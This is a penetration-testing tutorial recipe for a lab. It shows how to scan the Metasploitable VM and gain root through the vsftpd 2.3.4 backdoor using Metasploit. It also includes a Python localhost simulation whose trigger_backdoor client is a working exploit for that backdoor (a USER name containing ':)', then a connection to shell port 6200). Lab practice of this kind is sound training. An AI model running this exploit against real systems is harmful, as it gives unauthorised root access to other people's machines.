When learning how to scan and exploit a Linux machine, the first problem is finding a target you are allowed to attack. For this purpose, the Metasploit team developed and released a virtual machine called Metasploitable. The machine is vulnerable on purpose: it runs many services that are outdated and unpatched, which makes it a good platform for practicing and developing penetration testing skills. In this section, we will learn how to scan a Linux system, use the scan results to find a vulnerable service, and then use that service to gain root access to the system.
Gaining root on a vulnerable Linux system
Getting ready
Kali Linux and the Metasploitable VMware image (Metasploitable 2, the release that ships vsftpd 2.3.4) will be used in this section. The image file of Metasploitable can be downloaded from these links:
How to do it...
The Metasploit Framework is an open source tool used by security professionals worldwide to perform penetration tests by running exploit modules against target systems from within the framework. It comes pre-installed on Kali Linux, the distribution most commonly used for this kind of work.
Follow these steps to gain root access to a vulnerable Linux system:
- First, start the PostgreSQL database that Metasploit uses for its workspace and module cache, then open the Metasploit console on the Kali system by running the following commands:
service postgresql start
msfconsole
- At the bottom of the screen, you should get the Metasploit Framework prompt, denoted by msf > (current releases show the major version in the prompt, for example msf6 >).
- Next, we need to scan the target, which is 192.168.0.102 in this example, using Nmap. Use a service-version scan (Nmap's -sV option), because the version string is what we need in the following steps:
The following screenshot shows the output of the command:
- In the output of the previous command, you can see that many services are running on different ports. Among them, FTP is running on port 21.
- We will focus on the FTP service for now. From the output shown, you can see that the FTP service is provided by vsftpd version 2.3.4.
- Now let's try to find an exploit for vsftpd within the Metasploit Framework by simply executing the command search vsftpd. Here is the output:
- The search results show a module, VSFTPD Backdoor Command Execution (exploit/unix/ftp/vsftpd_234_backdoor), with an Excellent rank. The rank describes reliability: an Excellent module does not crash the service and does not depend on version-specific memory layouts, so it is expected to work whenever the target is actually running the backdoored version.
- Now run the following commands to select the module (use) and list its options (show options):
- As you can see from the screenshot, you need to set the value of RHOST, which is 192.168.0.102 in our case (in current Metasploit releases the option is named RHOSTS).
- Set RHOST to the target address and then run the exploit as shown here:
- Once the exploit runs successfully, you get a command shell session on the target, as shown in the preceding screenshot. Verify that it is a root shell by running id or whoami in the session; the output should show uid=0(root).
How it works...
We first ran an Nmap scan to check for open ports and running services, and found the FTP service running. With version detection, Nmap told us the service was vsftpd 2.3.4. We then searched Metasploit for an exploit against that version and found the VSFTPD backdoor module. Despite its name, this is not a classic coding mistake in vsftpd: in 2011 the vsftpd 2.3.4 source archive on the project's download site was replaced with a copy containing a planted backdoor. A daemon built from that archive reacts to a username containing the two characters :) by opening a listening socket on TCP port 6200 and attaching a /bin/sh to it. Because the daemon has not yet dropped privileges at that point, the shell runs as root. The Metasploit module simply sends a USER command with the smiley appended, follows it with a PASS command, and then connects to port 6200; the session it returns is that root shell, which is why the exploit needs no payload of its own.
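The following simulation is an added example for this recipe and is not part of the original text or of Metasploit's module code. It reproduces, entirely on localhost, both the steps above and the mechanism just described: FakeVsftpd234 is a constructed stand-in for a backdoored vsftpd 2.3.4 (the banner, the :) trigger and the default port 6200 are the real values; everything else is simplified, and the fake "shell" only answers id), and trigger_backdoor does what exploit/unix/ftp/vsftpd_234_backdoor does: check the banner, send USER with the smiley, send PASS, connect to the shell port and confirm uid=0. The names FakeVsftpd234, trigger_backdoor, free_port and recv_line are this example's own. Only point the client at systems you own or are authorised to test.

```python
import socket
import threading
import time

# Real values from the planted backdoor: the two-byte smiley that triggered it
# when present in the FTP USER argument, and the port its root shell listened on.
BACKDOOR_TRIGGER = b":)"
BACKDOOR_PORT = 6200
REAL_BANNER = b"220 (vsFTPd 2.3.4)\r\n"


def free_port():
    """Pick an unused localhost TCP port so the simulation never needs port 6200."""
    with socket.socket() as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


def recv_line(sock):
    """Read one CRLF/LF-terminated line from a socket (empty bytes on close)."""
    buf = b""
    while not buf.endswith(b"\n"):
        chunk = sock.recv(1)
        if not chunk:
            break
        buf += chunk
    return buf


class FakeVsftpd234(threading.Thread):
    """Constructed stand-in for a backdoored vsftpd 2.3.4 (simulation, not the real daemon).

    Speaks just enough FTP to show the trigger: on a USER argument containing the
    smiley it binds the shell listener and, like the real daemon, blocks there
    without ever answering the login.
    """

    def __init__(self, backdoor_port=BACKDOOR_PORT, banner=REAL_BANNER):
        super().__init__(daemon=True)
        self.backdoor_port = backdoor_port
        self.banner = banner
        self.triggered = False
        self.ctrl = socket.socket()
        self.ctrl.bind(("127.0.0.1", 0))  # port 0 = any free port, read back below
        self.ctrl.listen(1)
        self.port = self.ctrl.getsockname()[1]

    def run(self):
        conn, _ = self.ctrl.accept()
        self.ctrl.close()
        with conn, conn.makefile("rb") as lines:
            conn.sendall(self.banner)
            for line in lines:
                verb, _, arg = line.rstrip(b"\r\n").partition(b" ")
                if verb.upper() == b"USER" and BACKDOOR_TRIGGER in arg:
                    self.triggered = True
                    listener = socket.socket()
                    listener.bind(("127.0.0.1", self.backdoor_port))
                    listener.listen(1)
                    self._serve_shell(listener)  # blocks, exactly like vsf_sysutil_extra()
                    break
                if verb.upper() == b"USER":
                    conn.sendall(b"331 Please specify the password.\r\n")
                elif verb.upper() == b"PASS":
                    conn.sendall(b"530 Login incorrect.\r\n")
                else:
                    conn.sendall(b"500 Unknown command.\r\n")

    @staticmethod
    def _serve_shell(listener):
        """Pretend to be the /bin/sh the backdoor attached to the socket."""
        with listener:
            shell, _ = listener.accept()
        with shell, shell.makefile("rb") as cmds:
            for cmd in cmds:
                if cmd.strip() == b"id":
                    shell.sendall(b"uid=0(root) gid=0(root) groups=0(root)\n")
                else:
                    shell.sendall(b"sh: only 'id' is simulated here\n")


def trigger_backdoor(host, ftp_port, backdoor_port=BACKDOOR_PORT, attempts=50):
    """Mirror the Metasploit module: banner check, USER with :), PASS, connect to the shell.

    Returns the output of `id` from the backdoor shell, or None when the banner is
    not vsftpd 2.3.4 or no shell port appears.
    """
    with socket.create_connection((host, ftp_port), timeout=5) as ctrl:
        banner = recv_line(ctrl)
        if b"vsFTPd 2.3.4" not in banner:
            return None  # not the backdoored release: do not poke at it
        ctrl.sendall(b"USER letmein" + BACKDOOR_TRIGGER + b"\r\n")
        ctrl.sendall(b"PASS anything\r\n")
        shell = None
        for _ in range(attempts):  # the daemon never replies; poll the shell port
            try:
                shell = socket.create_connection((host, backdoor_port), timeout=5)
                break
            except OSError:
                time.sleep(0.1)
        if shell is None:
            return None
        with shell:
            shell.sendall(b"id\n")
            return recv_line(shell).decode().strip()


if __name__ == "__main__":
    srv = FakeVsftpd234(backdoor_port=free_port())  # free port instead of 6200 for the demo
    srv.start()
    print(trigger_backdoor("127.0.0.1", srv.port, srv.backdoor_port))
```

The client polls the shell port rather than waiting for an FTP reply because the backdoored daemon blocks in accept() as soon as it sees the smiley and never answers the USER command; the banner check at the top is the same precondition the Metasploit module relies on, and a patched banner makes the function stop before sending anything.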
There's more...
Let's learn about a few more exploits and attacks that are common in Linux.